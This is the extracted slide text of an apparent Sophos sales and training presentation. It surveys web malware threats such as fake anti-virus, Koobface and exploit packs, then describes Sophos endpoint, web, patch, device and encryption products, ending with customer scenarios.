Endpoint and web security

What?

Variants and volumes

APT What does it mean?

Before Aurora

Now

Custom Exploit Code

Better than us

Multiple Entry/Exit points

We didnt notice for a while

Diverse Actors

Insert random foreign country

here

Hijacked trusted sites

Theres no such thing as a trusted site

Fake anti-virus/scareware
Fake anti-virus
Fake anti-spyware
System optimizers

Et tu, Mac?
MacDefender, MacSecurity, and many more

Social networking raises risks

Koobface
Feature rich and evolving

Steal software keys

Upload stored passwords
Web server
DNS proxy
Search hijacking
CAPTCHA busting
Pay Per Click (PPC) fraud
Fake anti-virus installs
Social network spambot

Screenshot courtesy of abuse.ch

Who?

Affiliate marketing, Russian style

Estdomains

McColo
Botnet C&C
Spam sites
Child abuse content
Malware
Fake anti-virus
Identity Theft (500,000+ Bank accounts)

Little penalty for great gains

150 Years
$13-65 Billion

Probation and 30 hours

Community Service
Infected Millions of PCs

How?

Spamming tools increase SEO

Multithreaded
Web spam tool
Automatically creates forum/
blog/webmail accounts
Uses proxies for IP diversity
CAPTCHA busting
Content based on topic
$440
Supports PHPBB, PHPNuke,
wikis, LiveJournal, Vbulletin,
Facebook, Gmail, etc

Server-side polymorphism
Obfuscation engine on the server
(PHP)
JavaScript returned changes
on each page request
Challenge to generic detection
Core AV engine needs to
see through obfuscation
Cannot afford performance
hit
Large effort in building heuristics to
distinguish legitimate and
malicious JavaScript

Web threat tree legitimate

sites

Web threat tree redirects to

attacker

Web threat tree attacks

vulnerabilities

Web threat tree deliver

payload

Why?

Motives
Yes Stereotypes

Intellectual property is the new gold

Zero day Flash vulnerability
Inadequate monitoring
Victims of their own success

Pharma profitability
Date

Orders

01

30

02

74

03

216

04

193

05

231

06

191

07

189

08

78

09

99

124*160 = $19840 * 40% =

10

128

11

52

$7936/day

12

Average sales per

day

124

This affiliate used 66 unique

domains referencing
his Affiliate ID
124 orders per day
Average sale = $160
40% commission

Fake anti-virus profitability

Statistics from topsale2.ru

Whats it worth?

Pirated software

Endpoint protection
Exchange
Server Protection

Application
Control

Device Control

Anti-malware

Access control

Virtualization

Intrusion
prevention

Web
Protection

Firewall

Encryption

Data Control
Patch assessment

Anti-malware
Stop attacks and breaches

Sophos AV
A single engine to protect from all malware
Genotyping technology
Active Protection cloud technologies:

Live URL filter: Stops URLs we know are bad instantly

Live anti-virus: Checks in seconds to see if a suspicious file

might be a real threat

Fast and low impact scanning

Small updates, frequently applied

Intrusion prevention
Stop attacks and breaches

Sophos HIPS

Behavioral detection
Suspicious file detection
Suspicious behavior detection
Buffer overflow detection
Rules create by SophosLabs via Active Protection

So reliable it's on by default

Malware solved
Stop attacks and breaches

http://www.sophos.com/support/knowledgebase/article/113342.html

Layered protection
Stop attacks and breaches

Active Protection
Stop attacks and breaches

Endpoint

Web

Email

Data

Mobile

Network

Not just a windows story

The web: one stop (malware) shop

Protect everywhere

A threat network

The number one source of infection

Legitimate sites are regularly infected

Productivity filtering isnt enough

Many applications accessing the web

How people do web protection today

Large scale deployments that focus on the gateway

Back-hauling traffic to appliances

None or limited protection for users not connecting to the gateway

Web protection
Protect everywhere

Basic Endpoint

Active Protection from malware and bad sites

Works in any browser

Web Filtering in Endpoint

Low-cost add-on integrated into the Endpoint/SEC

Reduce surface area of attack from risky parts of the web (porn, hate,
p2p, etc.)
Essential compliance and liability coverage for inappropriate sites

Web Protection Suite

Complete protection everywhere users go with Sophos LiveConnect

Full coverage of threats, compliance, productivity, liability, and visibility
Reduce investment & complexity in back-hauling/VPN/Gateway HW

Inside Sophos LiveConnect

Protect everywhere

Sophos Web Protection Suite

Enables full visibility and control

Policy and reporting synchronization
Immediate and automatic
Secure end-to-end encryption

Sophos Web Protection

Sophos Web Protection

Keep people working

Sophos Web Protection

Keep people working

Sophos Web Protection

Keep people working

Sophos Web Protection

Keep people working

Sophos Web Protection

Sophos Web Protection

NEW! Web Protection Suite
Complete web protection everywhere

NEW! Virtual Web Appliance (VMware)

Secure web gateway in a virtual appliance

NEW! Web Appliances (4 models)

Secure web gateway appliances

Patches as important as ever

Reduce attack surface

Anti-virus

Firewall
Current
Out of
date
None

Disabled
None
Enabled

Patch Status
Patched
Unpatched

MSRC August 2012

MSRC August 2012

The problem with patching

Reduce attack surface

No visibility of exposure level

Have users installed vulnerable applications?
Have users disabled automatic updates?
Is Microsoft WSUS/SCCM working correctly?
Dont know which patches to worry about!

Compliance audits become a real headache

Machines get compromised
Gartner: 90% of situations where machines got compromised, a patch or
configuration change existed that could have prevented it!

Patch assessment
Reduce attack surface

We assess all the key exploited applications

Checking for patches from 11 vendors

We accurately assess each endpoint

Local scans on every managed endpoint
Complex fingerprinting ensures patches accurately detected
Centralized reporting of relevant missing patches
Simple: no end-user interaction or messaging

We prioritize patches to make life easier

Sophos rates patch criticality via Active Protection
Sophos shows any malware associated with patches
Creates a focus on the patches that really matter!

Application control
Reduce attack surface

Malware exploits vulnerabilities in

applications
Exploit packs are sold on the black market
Specifically designed to exploit your applications

Applications wrongly applied:

Users trying to install and run unauthorized
applications
Some applications are risky
Unwanted applications might use bandwidth
Version control isnt easy

Some Common Exploit Packs:

Lupit
Blackhole Exploit 1.0
Mpack
Blackhole Exploit 1.1
Mushroom/unknown
Bleeding Life 2.0
Open Source Exploit (Metapack)
Bomba
Papka
CRIMEPACK 2.2.1
Phoenix 2.0
CRIMEPACK 2.2.8
Phoenix 2.1
CRIMEPACK 3.0
Phoenix 2.2
CRIMEPACK 3.1.3
Phoenix 2.3
Dloader
Phoenix 2.4
EL Fiiesta
Phoenix 2.5
Eleonore 1.3.2
Phoenix 2.7
Eleonore 1.4.1
Robopak
Eleonore 1.4.4 Moded
SEO Sploit pack
Eleonore 1.6.3a
Siberia
Eleonore 1.6.4
T-Iframer
Fragus 1
Unique Pack Sploit 2.1
Icepack
Impassioned Framework 1.0 Webattack
Yes Exploit 3.0RC
Incognito
Zombie Infection kit
iPack
Zopack
JustExploit
Katrin
Liberty 1.0.7
Liberty 2.1.0*

Application control
Reduce attack surface

Over 40 categories including:

Online storage

Browsers

P2P File sharing

Instant messaging

Virtualization tools

Remote access

USB program launchers

Games

Toolbars

Applications created and updated via Active Protection

But I need all of these

Device control
Reduce attack surface

Plugging the device gap:

Devices can carry malware

They take data everywhere
If theyre lost can you be sure theyre secure?
People will plug them in anywhere

Device control
Reduce attack surface

Control devices connected to computers

Granular control of:

Removable storage - USB keys, removable hard disks

Optical / disk drives - CD / DVD / HD-DVD / Blu-ray

Network devices:

Wi-Fi / Modems

Bluetooth

Infra-red

Data control
Stop attacks and breaches

Fully integrated endpoint DLP solution

Designed to prevent accidental data loss
Monitor and enforce on all common data exit points
Train staff through use of desktop prompts
Data types provided from Sophos via Active Protection
Integrated with email protection

PII

Client firewall
Stop attacks and breaches

Problem:

Open ports on PCs and Laptops are open doors to hackers

A computer without a firewall and connected to the internet is a target
Worms often target particular ports and protocols
Laptops can connect anywhere, you need different rules when theyre
outside your network

Solution:

Location aware policies

Identifies apps by checksum
Rollout invisible to users
Interactive management alerts to create rules
Stealth mode prevents unauthorized network access by hackers

Virtualization
We protect virtual environments. At no extra cost
Our lighter-weight agent is better than other traditional
Endpoint security solutions
Stagger scanning for virtual machines
No compromise on protection
Citrix Receiver plugin
Developing VMware vShield scanner

Encryption
Protect everywhere

Industrial strength full disk encryption

Deployed and managed from your endpoint console
Fast initial encryption
Full password recovery options

Deploy and manage

Keep people working

A single deployment wizard for all features

Single agent for:
Anti malware
HIPS
Device Control
Data Control
Web protection
Widest platform support
Console built for usability

Report

Report

Proof points
CRN: IT Buying Behaviors.
What are middle market CIOs saying?
Adjusting To The New Normal.
Middle market CIOs face the same day-to-day fightthey need to do more with less.
Small budgets and limited resources demand ROI on IT investments.
Bradley Burns, Technology Director, Duncan/Channon
..We are also looking for really good valuewhat kind of support we are going to
get, the product features. We look for all-in-one solutions with overall value.
Tony Diaz, Director of Information Technology, Montgomery & Co.
.CIOs have to take things in-house and choose vendor partners who offer more
all-in-one solutions for cheaper costs.

Different Opinions, Similar Consensus

Smaller budgets and limited IT resources definey buying behaviors. Its all about finding
all-in-one solutions and riding out current technology to its maximum lifeline.

Sophos is leading the way

In B2B End-to-End Security

Security as an
add-on to a
platform

Partial security

Security portfolio

Complete
security
without
complexity

Complete Security

Learning Exercises
Endpoint & Web Security
Scenario #1

School Town of Munster has 4,000 student with over 3,200 notebook computers in
use across the network

Business Challenges

CostMunster faced $3 million cut in state aid on top of previous cuts

PerformanceSymantec's Endpoint Client put so much overhead on machines

ProtectionMunster needed to protect 2800 notebook computers for school and

home use

Which Sophos fit?

They consolidated their protection with Sophos in 2012 with the Complete Security
Suite

Includes endpoint protection, advanced web protection, full-disk encryption, email

security, and data protection

Learning Exercises
Endpoint & Web Security
Scenario #2
Investors Savings Bank 500 users, 52 locations across 8 countries

Business Challenges

Need more control protecting network and data from rapidly evolving security
threats

Also wanted to ensure compliance with tighter industry standards and government
regulations

Which Sophos fit?

Sophos web appliance is protecting the bank against malware, phishing threats and
unwanted applications

Sophos email appliance is stopping spam, phishing, malware and data leakage

Sophos Endpoint Security and Control is providing tight, proactive security

Learning Exercises
Endpoint & Web Security
Scenario #3
Taco Bueno restaurant franchise has over 1,000 users across nine states

Business Challenges

Gain greater control over users' access to VoIP, games, social networking and other
applications that threaten security as well as productivity/

Strengthen its PCI compliance measures to further protect its customers' credit card
data

Which Sophos fit?

Sophoss professional services team helped upgrade all machines on its network for
190 restaurants across nine states

Upgrading the existing Sophos endpoint solution took the IT team less than two
hours

Taco Bueno chose Sophos Email Security, Sophos Web Security and Sophos
Endpoint Security and Control

Learning Exercises
Endpoint & Web Security
Scenario #4
Hitachi Medical Systems has 2 locations with 450 Users that include a large mobile
workforce

Business Challenges

Road-warriors were consistently bringing their infected laptops for IT to fix

Infected laptops are regularly returned to IT to repair the same problems

IT would like to monitor and report on what these users are doing

While controlling the sites they visit is not critical understanding whats going on is

Which Sophos fit?

Sophos Endpoint Protection

Sophos Web Protection

Complete Security